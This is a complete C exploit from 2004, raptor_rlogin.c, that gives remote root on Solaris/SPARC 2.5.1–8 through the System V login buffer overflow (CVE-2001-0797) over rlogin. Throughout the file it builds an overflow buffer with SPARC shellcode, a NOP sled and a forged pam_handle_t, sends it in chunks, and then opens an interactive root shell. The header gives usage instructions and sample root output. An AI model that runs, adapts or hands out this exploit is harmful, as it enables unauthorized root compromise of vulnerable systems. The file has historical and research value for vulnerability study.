/*
* $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Buffer overflow in login in various System V based operating systems
* allows remote attackers to execute arbitrary commands via a large number
* of arguments through services such as telnet and rlogin (CVE-2001-0797).
*
* Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004
*
* This remote root exploit uses the (old) System V based /bin/login
* vulnerability via the rlogin attack vector, returning into the .bss
* section to effectively bypass the non-executable stack protection
* (noexec_user_stack=1 in /etc/system).
*
* Many thanks to scut <scut@nb.in-berlin.de> (0dd) for his elite pam_handle_t
* technique (see 7350logout.c), also thanks to inode <inode@deadlocks.info>.
*
* Usage (must be root):
* # gcc raptor_rlogin.c -o raptor_rlogin -Wall
* [on solaris: gcc raptor_rlogin.c -o raptor_rlogin -Wall -lxnet]
* # ./raptor_rlogin -h 192.168.0.50
* [...]
* # id;uname -a;uptime;
* uid=0(root) gid=0(root)
* SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
* 7:45pm up 12 day(s), 18:42, 1 user, load average: 0.00, 0.00, 0.01
* #
*
* Vulnerable platforms (SPARC):
* Solaris 2.5.1 without patch 106160-02 [untested]
* Solaris 2.6 without patch 105665-04 [untested]
* Solaris 7 without patch 112300-01 [untested]
* Solaris 8 without patch 111085-02 [tested]
*/
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define INFO1 "raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define BUFSIZE 3000 // max size of the evil buffer
#define RETADDR 0x27184 // retaddr, should be reliable
#define TIMEOUT 10 // net_read() default timeout
#define CMD "id;uname -a;uptime;\n" // executed upon exploitation
char sc[] = /* Solaris/SPARC special shellcode (courtesy of inode) */
/* execve() + exit() */
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4"
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08";
char sparc_nop[] = /* Solaris/SPARC special nop (xor %sp, %sp, %o0) */
"\x90\x1b\x80\x0e";
/* prototypes */
int exploit_addchar(unsigned char *ww, unsigned char wc);
void fatalerr(char *func, char *error, int fd);
int net_connect(char *host, int port, int timeout);
int net_read(int fd, char *buf, int size, int timeout);
int net_resolve(char *host);
int sc_copy(unsigned char *buf, char *str, long len);
void set_val(char *buf, int pos, int val);
void shell(int fd);
void usage(char *progname);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], *p = buf;
char c, *host = NULL, term[] = "vt100/9600";
int fd, i, found, len;
int timeout = TIMEOUT, debug = 0;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* parse command line */
if (argc < 2)
usage(argv[0]);
while ((c = getopt(argc, argv, "dh:t:")) != EOF)
switch(c) {
case 'h':
host = optarg;
break;
case 't':
timeout = atoi(optarg);
break;
case 'd':
debug = 1;
break;
default:
usage(argv[0]);
}
if (!host)
usage(argv[0]);
/* connect to the target host */
fd = net_connect(host, 513, 10);
fprintf(stderr, "# connected to remote host: %s\n", host);
/* signal handling */
signal(SIGPIPE, SIG_IGN);
/* begin the rlogin session */
memset(buf, 0, sizeof(buf));
if (send(fd, buf, 1, 0) < 0)
fatalerr("send", strerror(errno), fd);
if (net_read(fd, buf, sizeof(buf), timeout) < 0)
fatalerr("error", "Timeout reached in rlogin session", fd);
/* dummy rlogin authentication */
memcpy(p, "foo", 3); // local login name
p += 4;
memcpy(p, "bar", 3); // remote login name
p += 4;
memcpy(p, term, sizeof(term)); // terminal type
p += sizeof(term);
fprintf(stderr, "# performing dummy rlogin authentication\n");
if (send(fd, buf, p - buf, 0) < 0)
fatalerr("send", strerror(errno), fd);
/* wait for password prompt */
found = 0;
memset(buf, 0, sizeof(buf));
while (net_read(fd, buf, sizeof(buf), timeout)) {
if (strstr(buf, "assword: ") != NULL) {
found = 1;
break;
}
memset(buf, 0, sizeof(buf));
}
if (!found)
fatalerr("error", "Timeout waiting for password prompt", fd);
/* send a dummy password */
if (send(fd, "pass\n", 5, 0) < 0)
fatalerr("send", strerror(errno), fd);
/* wait for login prompt */
found = 0;
memset(buf, 0, sizeof(buf));
fprintf(stderr, "# waiting for login prompt\n");
while (net_read(fd, buf, sizeof(buf), timeout)) {
if (strstr(buf, "ogin: ") != NULL) {
found = 1;
break;
}
memset(buf, 0, sizeof(buf));
}
if (!found)
fatalerr("error", "Timeout waiting for login prompt", fd);
fprintf(stderr, "# returning into 0x%08x\n", RETADDR);
/* for debugging purposes */
if (debug) {
printf("# debug: press enter to continue");
scanf("%c", &c);
}
/* prepare the evil buffer */
memset(buf, 0, sizeof(buf));
p = buf;
/* login name */
memcpy(p, "foo ", 4);
p += 4;
/* return address (env) */
set_val(p, 0, RETADDR);
p += 4;
memcpy(p, " ", 1);
p++;
/* trigger the overflow (env) */
for (i = 0; i < 60; i++, p += 2)
memcpy(p, "a ", 2);
/* padding */
memcpy(p, " BBB", 4);
p += 4;
/* nop sled and shellcode */
for (i = 0; i < 398; i++, p += 4)
memcpy(p, sparc_nop, 4);
p += sc_copy(p, sc, sizeof(sc) - 1);
/* padding */
memcpy(p, "BBB ", 4);
p += 4;
/* pam_handle_t: minimal header */
memcpy(p, "CCCCCCCCCCCCCCCC", 16);
p += 16;
set_val(p, 0, RETADDR); // must be a valid address
p += 4;
set_val(p, 0, 0x01);
p += 4;
/* pam_handle_t: NULL padding */
for (i = 0; i < 52; i++, p += 4)
set_val(p, 0, 0x00);
/* pam_handle_t: pameptr must be the 65th ptr */
memcpy(p, "\x00\x00\x00 AAAA\n", 9);
p += 9;
/* send the evil buffer, 256 chars a time */
len = p - buf;
p = buf;
while (len > 0) {
fprintf(stderr, "#");
i = len > 0x100 ? 0x100 : len;
send(fd, p, i, 0);
len -= i;
p += i;
if (len)
send(fd, "\x04", 1, 0);
usleep(500000);
}
fprintf(stderr, "\n");
/* wait for password prompt */
found = 0;
memset(buf, 0, sizeof(buf));
fprintf(stderr, "# evil buffer sent, waiting for password prompt\n");
while (net_read(fd, buf, sizeof(buf), timeout)) {
if (strstr(buf, "assword: ") != NULL) {
found = 1;
break;
}
memset(buf, 0, sizeof(buf));
}
if (!found)
fatalerr("error", "Most likely not vulnerable", fd);
fprintf(stderr, "# password prompt received, waiting for shell\n");
if (send(fd, "pass\n", 5, 0) < 0)
fatalerr("send", strerror(errno), fd);
/* wait for shell prompt */
memset(buf, 0, sizeof(buf));
found = 0;
while (net_read(fd, buf, sizeof(buf), timeout)) {
if (strstr(buf, "# ") != NULL) {
found = 1;
break;
}
memset(buf, 0, sizeof(buf));
}
if (!found)
fatalerr("error", "Most likely not vulnerable", fd);
/* connect to the remote shell */
fprintf(stderr, "# shell prompt detected, successful exploitation\n\n");
shell(fd);
exit(0);
}
/*
* exploit_addchar(): char translation for pam (ripped from scut)
*/
int exploit_addchar(unsigned char *ww, unsigned char wc)
{
unsigned char * wwo = ww;
switch (wc) {
case ('\\'):
*ww++ = '\\';
*ww++ = '\\';
break;
case (0xff):
case ('\n'):
case (' '):
case ('\t'):
*ww++ = '\\';
*ww++ = ((wc & 0300) >> 6) + '0';
*ww++ = ((wc & 0070) >> 3) + '0';
*ww++ = (wc & 0007) + '0';
break;
default:
*ww++ = wc;
break;
}
return (ww - wwo);
}
/*
* fatalerr(): error handling routine
*/
void fatalerr(char *func, char *error, int fd)
{
fprintf(stderr, "%s: %s\n", func, error);
close(fd);
exit(1);
}
/*
* net_connect(): simple network connect with timeout
*/
int net_connect(char *host, int port, int timeout)
{
int fd, i, flags, sock_len;
struct sockaddr_in sin;
struct timeval tv;
fd_set fds;
/* allocate a socket */
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("socket");
exit(1);
}
/* bind a privileged port (FIXME) */
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
for (i = 1023; i > 0; i--) {
sin.sin_port = htons(i);
if (!(bind(fd, (struct sockaddr *)&sin, sizeof(sin))))
break;
}
if (i == 0)
fatalerr("error", "Can't bind a privileged port (must be root)", fd);
/* resolve the peer address */
sin.sin_port = htons(port);
if (!(sin.sin_addr.s_addr = net_resolve(host)))
fatalerr("error", "Can't resolve hostname", fd);
/* set non-blocking */
if ((flags = fcntl(fd, F_GETFL, 0)) < 0)
fatalerr("fcntl", strerror(errno), fd);
if (fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
fatalerr("fcntl", strerror(errno), fd);
/* connect to remote host */
if (!(connect(fd, (struct sockaddr *)&sin, sizeof(sin)))) {
if (fcntl(fd, F_SETFL, flags) < 0)
fatalerr("fcntl", strerror(errno), fd);
return(fd);
}
if (errno != EINPROGRESS)
fatalerr("error", "Can't connect to remote host", fd);
/* set timeout */
tv.tv_sec = timeout;
tv.tv_usec = 0;
/* setup select structs */
FD_ZERO(&fds);
FD_SET(fd, &fds);
/* select */
if (select(FD_SETSIZE, NULL, &fds, NULL, &tv) <= 0)
fatalerr("error", "Can't connect to remote host", fd);
/* check if connected */
sock_len = sizeof(sin);
if (getpeername(fd, (struct sockaddr *)&sin, &sock_len) < 0)
fatalerr("error", "Can't connect to remote host", fd);
if (fcntl(fd, F_SETFL, flags) < 0)
fatalerr("fcntl", strerror(errno), fd);
return(fd);
}
/*
* net_read(): non-blocking read from fd
*/
int net_read(int fd, char *buf, int size, int timeout)
{
fd_set fds;
struct timeval wait;
int n = -1;
/* set timeout */
wait.tv_sec = timeout;
wait.tv_usec = 0;
memset(buf, 0, size);
FD_ZERO(&fds);
FD_SET(fd, &fds);
/* select with timeout */
if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
perror("select");
exit(1);
}
/* read data if any */
if (FD_ISSET(fd, &fds))
n = read(fd, buf, size);
return n;
}
/*
* net_resolve(): simple network resolver
*/
int net_resolve(char *host)
{
struct in_addr addr;
struct hostent *he;
memset(&addr, 0, sizeof(addr));
if ((addr.s_addr = inet_addr(host)) == -1) {
if (!(he = (struct hostent *)gethostbyname(host)))
return(0);
memcpy((char *)&addr.s_addr, he->h_addr, he->h_length);
}
return(addr.s_addr);
}
/*
* sc_copy(): copy the shellcode, using exploit_addchar()
*/
int sc_copy(unsigned char *buf, char *str, long len)
{
unsigned char *or = buf;
int i;
for(i = 0; i < len; i++)
buf += exploit_addchar(buf, str[i]);
return(buf - or);
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}
/*
* shell(): semi-interactive shell hack
*/
void shell(int fd)
{
fd_set fds;
char tmp[128];
int n;
/* quote Hvar 2004 */
fprintf(stderr, "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n");
/* execute auto commands */
write(1, "# ", 2);
write(fd, CMD, strlen(CMD));
/* semi-interactive shell */
for (;;) {
FD_ZERO(&fds);
FD_SET(fd, &fds);
FD_SET(0, &fds);
if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
perror("select");
break;
}
/* read from fd and write to stdout */
if (FD_ISSET(fd, &fds)) {
if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
fprintf(stderr, "Goodbye...\n");
break;
}
if (write(1, tmp, n) < 0) {
perror("write");
break;
}
}
/* read from stdin and write to fd */
if (FD_ISSET(0, &fds)) {
if ((n = read(0, tmp, sizeof(tmp))) < 0) {
perror("read");
break;
}
if (write(fd, tmp, n) < 0) {
perror("write");
break;
}
}
}
close(fd);
exit(1);
}
void usage(char *progname)
{
fprintf(stderr, "usage: %s [-h host] [-t timeout] [-d]\n\n", progname);
fprintf(stderr, "-h host\t\tdestination ip or fqdn\n");
fprintf(stderr, "-t timeout\tnet_read() timeout (default: %d)\n", TIMEOUT);
fprintf(stderr, "-d\t\tturn on debug mode\n\n");
exit(1);
}
// milw0rm.com [2004-12-24]